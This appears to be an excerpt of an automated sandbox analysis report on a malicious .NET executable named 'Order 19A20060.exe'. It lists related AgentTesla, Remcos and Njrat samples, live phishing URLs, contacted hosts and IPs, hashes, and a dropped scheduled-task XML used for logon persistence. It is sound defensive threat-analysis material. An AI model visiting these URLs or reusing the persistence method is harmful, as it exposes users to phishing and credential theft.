                                                        • api.ipify.org/
                                                        lods.cmdGet hashmaliciousRemcosBrowse
                                                        • api.ipify.org/
                                                        50.87.139.143Proforma Invoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                          SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            SHIPPING DOC.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              New order.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                Quotation R2100131410.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                  SecuriteInfo.com.Trojan.MSIL.Krypt.2433.31957.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                    z92BankingDetails.exeGet hashmaliciousAgentTeslaBrowse
                                                                      z14Paymentslip.exeGet hashmaliciousAgentTeslaBrowse
                                                                        PO_0130717.exeGet hashmaliciousAgentTeslaBrowse
                                                                          SecuriteInfo.com.Win32.RATX-gen.20501.5539.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            api.ipify.orghttps://secure.adnxs.com/clktrb?id=360572&redir=//barslaves.com/guedassea/Novozymes/amVia0Bub3ZvenltZXMuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                            • 104.26.12.205
                                                                            Proforma Invoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 172.67.74.152
                                                                            Doc-0113687pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                            • 172.67.74.152
                                                                            http://accedii.194-48-251-87.cprapid.com/index.phpGet hashmaliciousHTMLPhisherBrowse
                                                                            • 104.26.12.205
                                                                            http://web.logodesign.net/preview/8bf6d88a?device=desktopGet hashmaliciousHTMLPhisherBrowse
                                                                            • 104.26.13.205
                                                                            Arrival Notice.pif.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 104.26.12.205
                                                                            NEW PO (PO01-240111).exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 104.26.12.205
                                                                            NEW PO (PO01-26022024).exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 104.26.12.205
                                                                            EGF.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 172.67.74.152
                                                                            BCAF23090415-FA-INV.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 172.67.74.152
                                                                            mail.elec-qatar.comProforma Invoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 50.87.139.143
                                                                            SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 50.87.139.143
                                                                            SHIPPING DOC.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 50.87.139.143
                                                                            New order.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 50.87.139.143
                                                                            Quotation R2100131410.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 50.87.139.143
                                                                            SecuriteInfo.com.Trojan.MSIL.Krypt.2433.31957.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 50.87.139.143
                                                                            z92BankingDetails.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 50.87.139.143
                                                                            z14Paymentslip.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 50.87.139.143
                                                                            PO_0130717.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 50.87.139.143
                                                                            SecuriteInfo.com.Win32.RATX-gen.20501.5539.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                            • 50.87.139.143
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            CLOUDFLARENETUShttps://shellmarine.my.site.com/PartnersInSafety/login?c=ZcFpk6Z.xNZw1ykDfn.Be9v35Zh4v7iOpvR7KqFUVXjlNAN_1X9_m0AHXZMSWs_QPCV3_3c3YLNlz9YiM.JzWaWCfa0Lb9nsY_EPjqXBv25eef02TJT3QR8Bs5pJOZPluxyBxg17IgXjBgIpHwphrBjR_Y63IpDPS97sUBivy7qO0.dVduyhncdbQ4QoGEDIAPaQsjp4Get hashmaliciousUnknownBrowse
                                                                            • 1.1.1.1
                                                                            https://secure.adnxs.com/clktrb?id=360572&redir=//barslaves.com/guedassea/Novozymes/amVia0Bub3ZvenltZXMuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                            • 172.67.172.36
                                                                            Proforma Invoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 172.67.74.152
                                                                            Quotation Drawing Specification.exeGet hashmaliciousRemcosBrowse
                                                                            • 172.67.200.220
                                                                            BBKKOUO PDF.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                            • 172.67.177.75
                                                                            Doc-0113687pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                            • 172.67.74.152
                                                                            http://document-85cc2.web.appGet hashmaliciousUnknownBrowse
                                                                            • 104.26.5.119
                                                                            https://docs.google.com/forms/u/0/d/e/1FAIpQLSe7q5ELD0ukHZ7E6KcHXkiDMqI8vRMEd1vxtrUgZ3-pPemPWQ/viewscore?vc=0&c=0&w=1&flr=0&viewscore=AE0zAgD_gSPU3bQwis0na0pzUXbgBAd1xpQtr8HDV7R55sQZ0C5IFM4azxVqGdNtN9k8HUMGet hashmaliciousGRQ ScamBrowse
                                                                            • 172.67.12.83
                                                                            xZnG1FFx7L.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                            • 104.21.94.2
                                                                            https://netorg5340145-my.sharepoint.com/:b:/g/personal/info_curreg_com/EZSUhMT59IlCp8Kk3FQpxOYBrWtNELH-5C2z2AFosN0--g?e=qYrYWhGet hashmaliciousHTMLPhisherBrowse
                                                                            • 104.17.2.184
                                                                            UNIFIEDLAYER-AS-1USProforma Invoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 50.87.139.143
                                                                            https://kgp.xfi.mybluehost.me/wp-content/upgrade/maiil/home2/home/support/net/login.phpGet hashmaliciousUnknownBrowse
                                                                            • 50.87.231.172
                                                                            Arrival Notice.pif.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 50.87.150.204
                                                                            https://lookerstudio.google.com/s/pmOrPFC9q6EGet hashmaliciousHTMLPhisherBrowse
                                                                            • 192.185.182.159
                                                                            https://api.spently.com/api/spently/click?id=105133&store=hotelcollection&type=OI&cid=6272440696998&url=amoreex.com/Encinacapital/%23anJlc3NhQGVuY2luYWNhcGl0YWwuY29t%2F%3Futm_source%3DDatabase%26utm_medium%3DEmail%26utm_campaign%3DLisini%2520eGiftsGet hashmaliciousHTMLPhisherBrowse
                                                                            • 108.179.193.93
                                                                            https://tracker.club-os.com/campaign/click?99559ms99559gId=d738c6bd137e6a03157c6c728cbc659e734fc398&test=false&target=https://blicblac%E3%80%82com/#grhrbmVlbHkuZWRkbGVzdG9uQGFtY25ldHdvcmtzLmNvbQ==??kqysne&buhpvbdd/q4vJwGLrOcjgXKyw/t7FqNJad60pBYUT2uZA8g6vHQqWz//bmVlbHkuZWRkbGVzdG9uQGFtY25ldHdvcmtzLmNvbQ==&https://instagram.comGet hashmaliciousFake Captcha, HTMLPhisherBrowse
                                                                            • 192.185.148.81
                                                                            https://tracker.club-os.com/campaign/click?qDomYmsgId=d738c6bd137e6a03157c6c728cbc659e734fc398&test=false&target=qaryaconnect.com/content/6f94e370dff0d5fa0ea5bb98441b64c7/alT1ZF/c2FsZXNub0Bjb2dlbnQtcG93ZXIuY29tGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                            • 192.185.112.131
                                                                            IPELLUZ1_2024-02-26_11_26_26.699.zipGet hashmaliciousUnknownBrowse
                                                                            • 192.185.106.74
                                                                            payment form.doc.bat.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                            • 50.116.112.104
                                                                            ORDER #25376283982.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 50.87.150.204
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            3b5074b1b5d032e5620f69f9f700ff0eProforma Invoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 104.26.12.205
                                                                            Doc-0113687pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                            • 104.26.12.205
                                                                            Scanned-Statement_Pov03499727628966122376398775274656600052690463249885.wsfGet hashmaliciousUnknownBrowse
                                                                            • 104.26.12.205
                                                                            https://www.ungrbly.cn/Get hashmaliciousUnknownBrowse
                                                                            • 104.26.12.205
                                                                            https://libbycolon.autos/serene/dune/?box=violetGet hashmaliciousTechSupportScamBrowse
                                                                            • 104.26.12.205
                                                                            https://en-us.secureconnection.moneytransaction.kb4.ioGet hashmaliciousUnknownBrowse
                                                                            • 104.26.12.205
                                                                            Arrival Notice.pif.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 104.26.12.205
                                                                            bTHf.exeGet hashmaliciousNjratBrowse
                                                                            • 104.26.12.205
                                                                            bTGj.exeGet hashmaliciousNjratBrowse
                                                                            • 104.26.12.205
                                                                            bTHf.exeGet hashmaliciousNjratBrowse
                                                                            • 104.26.12.205
                                                                            No context
                                                                            Process:C:\Users\user\Desktop\Order 19A20060.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1216
                                                                            Entropy (8bit):5.34331486778365
                                                                            Encrypted:false
                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                            Process:C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1216
                                                                            Entropy (8bit):5.34331486778365
                                                                            Encrypted:false
                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):2232
                                                                            Entropy (8bit):5.380747059108785
                                                                            Encrypted:false
                                                                            SSDEEP:48:lylWSU4y4RYdmloUeW+gZ9tK8NPZHUxL7u1iMuge//8PUyus:lGLHyIYMqLgZ2KRHWLOug8s
                                                                            MD5:A27B7CA90E61EEC84C0C0E050061F472
                                                                            SHA1:DD1171C73F02B27802B9DED0C77D6A183EC72ECD
                                                                            SHA-256:8F2FE3AEF20EF463680BA917947BDB518A52321F861792A2C41403A4EDEDA780
                                                                            SHA-512:967E83A6A2E4045DC91AB541BE4E733F6F64322450F719E5A1192836660A112C6526537E0B1369976192AC84634E29E00B87EC46522721F1A5E273D731B7EAE2
                                                                            Malicious:false
                                                                            Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<...............i..VdqF...|...........System.Configuration<................t.,.lG....M...........System.Management...4.................%...K... ...........System.Xml..@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Users\user\Desktop\Order 19A20060.exe
                                                                            File Type:XML 1.0 document, ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):1579
                                                                            Entropy (8bit):5.115435852371399
                                                                            Encrypted:false
                                                                            SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtacxvn:cge1wYrFdOFzOzN33ODOiDdKrsuT3v
                                                                            MD5:B8FBFF41A625F1B0F19D2882677F4EFE
                                                                            SHA1:6457479245995AA598E70D9EF626566DB19D052E
                                                                            SHA-256:46FE71F216F64875B374BDCDA086B8F33D6BD49BF0EB010B3E3C8E26F1AC4E7C
                                                                            SHA-512:B5E2DCE8628AF57CD25726247D375852D99BACA73043662A1486ACB7B18F6583DFBCCEC4EEEECB0E1A5BD05CF14DCD636D9013F5A466F60B8209CAEA90564F48
                                                                            Malicious:true
                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                            Process:C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
                                                                            File Type:XML 1.0 document, ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):1579
                                                                            Entropy (8bit):5.115435852371399
                                                                            Encrypted:false
                                                                            SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtacxvn:cge1wYrFdOFzOzN33ODOiDdKrsuT3v
                                                                            MD5:B8FBFF41A625F1B0F19D2882677F4EFE
                                                                            SHA1:6457479245995AA598E70D9EF626566DB19D052E
                                                                            SHA-256:46FE71F216F64875B374BDCDA086B8F33D6BD49BF0EB010B3E3C8E26F1AC4E7C
                                                                            SHA-512:B5E2DCE8628AF57CD25726247D375852D99BACA73043662A1486ACB7B18F6583DFBCCEC4EEEECB0E1A5BD05CF14DCD636D9013F5A466F60B8209CAEA90564F48
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                            Process:C:\Users\user\Desktop\Order 19A20060.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):717832
                                                                            Entropy (8bit):7.969051173968409
                                                                            Encrypted:false
                                                                            SSDEEP:12288:LKbUmJCQ7VRKSynEJFuR6g28pXYC5kBB+Fh+YDliuXci7o/zrj68p+zBh3HG8kR:LKbUnQBcSynEJF428pB5kBX+liuXL8/X
                                                                            MD5:3C162B1CAA9B65084775199AF23B06DE
                                                                            SHA1:4B401EEBFAB0A021D242CE7A1FF9C044D9813D10
                                                                            SHA-256:5857B336D7D9853E12A8396380A452B1EA5C390A0409FB58EE6E7E77D9AABE00
                                                                            SHA-512:4850ECC0EF5E1FB17879454E1A6B52DF6443D2C53488701CCF96AF33E254071875EC8DBE5C07307B8135B156479E21DB186E0D88CF9D07521116D51C3F54597A
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 68%
                                                                            • Antivirus: Virustotal, Detection: 38%, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0.................. ........@.. ....................... ............@.....................................O........................6..............p............................................ ............... ..H............text...<.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........R..xN..........p...8...........................................^..}.....(.......(.....*.0..+.........,..{.......+....,...{....o........(.....*..0................(....s .....s!...}.....s!...}.....s!...}.....s!...}.....s"...}.....s"...}.....s#...}.....s"...}.....s"...}.....s"...}.....s"...}.....{....o$.....(%.....{.....o&.....{......o'.....{....((...o).....{....r...p"...A...s*...o+.....{.....>.>.>(,...o-.....{.... .... ....s....o/.....{........s0...o1.....{....r...po2.
                                                                            Process:C:\Users\user\Desktop\Order 19A20060.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):26
                                                                            Entropy (8bit):3.95006375643621
                                                                            Encrypted:false
                                                                            SSDEEP:3:ggPYV:rPYV
                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                            Malicious:false
                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Entropy (8bit):7.969051173968409
                                                                            TrID:
                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                            • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                            File name:Order 19A20060.exe
                                                                            File size:717'832 bytes
                                                                            MD5:3c162b1caa9b65084775199af23b06de
                                                                            SHA1:4b401eebfab0a021d242ce7a1ff9c044d9813d10
                                                                            SHA256:5857b336d7d9853e12a8396380a452b1ea5c390a0409fb58ee6e7e77d9aabe00
                                                                            SHA512:4850ecc0ef5e1fb17879454e1a6b52df6443d2c53488701ccf96af33e254071875ec8dbe5c07307b8135b156479e21db186e0d88cf9d07521116d51c3f54597a
